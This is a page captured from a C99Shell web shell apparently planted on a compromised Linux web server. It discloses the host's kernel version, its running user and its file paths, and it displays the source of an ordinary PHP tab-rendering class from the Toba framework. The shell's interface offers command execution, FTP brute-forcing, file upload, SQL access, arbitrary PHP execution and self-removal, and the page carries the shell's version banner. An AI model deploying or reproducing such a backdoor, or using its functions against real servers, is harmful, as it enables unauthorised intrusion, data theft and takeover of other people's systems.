!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/nucleo/componentes/interface/botones/   drwxrwxr-x
Free 13.76 GB of 61.93 GB (22.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     toba_tab.php (3.15 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Representa a un tab o solapa, ya sea vertical u horizontal
 * @package Componentes
 * @subpackage Eis
 */
class toba_tab extends toba_boton
{
    
/**
     * Retorna el HTML del tab
     *
     * @param string $tipo 'V' para vertical o 'H' para horizontal
     * @param string $id_submit Id. unico del contenedor (utilizado para formar el id del tab)
     * @param string $id_componente Id. de js del componente contenedor
     * @param boolean $seleccionado
     * @param string $editor
     */
    
function get_html($tipo$id_submit$id_componente$seleccionado$editor='')
    {
        if ( 
$this->anulado ) return null;
        if( (
$tipo != 'V') && ($tipo != 'H') ) {
            throw new 
toba_error_def("Los tipos validos de TABS son 'V' y 'H'.");    
        }
        static 
$id_tab 1;
        
$evento $this->datos['identificador'];
        
$contenido '';
        
$tab_order toba_manejador_tabs::instancia()->siguiente();        
        
$img $this->get_imagen();
        if(!isset(
$img) && $tipo == 'H') {
            
$img gif_nulo(116);
        }
        
$contenido .= $img ' ';
        
$tip $this->datos['ayuda'];
        
$acceso tecla_acceso$this->datos['etiqueta'] );
        
$contenido .= $acceso[0];
        
$tecla $acceso[1];
        if (!isset(
$tecla)&&($id_tab<10)) $tecla $id_tab;
        
$tip str_replace("'""\\'",$tip);            
        
$acceso toba_recurso::ayuda($tecla$tip);
        
$id $id_submit.'_cambiar_tab_'.$evento;
        
$js "onclick=\"{$id_componente}.ir_a_pantalla('$evento');return false;\"";
        
$js_extra '';        
        if ( 
$this->activado ) {
            
$clase_boton '';            
        } else {
            
$clase_boton 'ci-tabs-boton-desact';
        }
        if( 
$tipo == 'H' ) {    //********************* TABs HORIZONTALES **********************
            
if( $seleccionado ) {// -- Tab ACTUAL --
                  
$estilo_li 'background:url("'.toba_recurso::imagen_skin('tabs/left_on.gif').'") no-repeat left top;';
                  
$estilo_a 'background:url("'.toba_recurso::imagen_skin('tabs/right_on.gif').'") no-repeat right top;';
                
$html "<li class='ci-tabs-h-solapa-sel'>$editor";
                
$html .= "<a href='#' id='$id$acceso>$contenido</a>";
                
$html .= "</li>";
            } else {
                
$oculto $this->oculto '; display: none' '';
                  
$estilo_li 'background:url("'.toba_recurso::imagen_skin('tabs/left.gif').'") no-repeat left top;';
                  
$estilo_a 'background:url("'.toba_recurso::imagen_skin('tabs/right.gif').'") no-repeat right top;';
                
$html "<li  class='ci-tabs-h-solapa' style='$oculto'>$editor";
                
$html .= "<a href='#' id='$id' class='$clase_boton$acceso $js>$contenido</a>";
                
$html .= "</li>";
                
$html .= $js_extra;
            }
        } else {                
// ********************* TABs VERTICALES ************************
            
if( $seleccionado ) {// -- Tab ACTUAL --
                
$html "<div class='ci-tabs-v-solapa-sel'><div class='ci-tabs-v-boton-sel'>$editor ";
                
$html .= "<div id='$id'>$contenido</div>";
                
$html .= "</div></div>";
            } else {
                
$clase_extra '';
                if (! 
$this->activado) {
                    
$clase_extra 'ci-tabs-v-desactivado';
                }
                
$oculto $this->oculto "style='display: none'" '';
                
$html "<div class='ci-tabs-v-solapa $clase_extra$oculto >$editor ";
                
$html .= "<a href='#' id='$id$clase_extra $acceso $js>$contenido</a>";
                
$html .= "</div>";
                
$html .= $js_extra;
            }
        }
        
$id_tab++;
        return 
$html;
    }    
    
    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.9162 ]--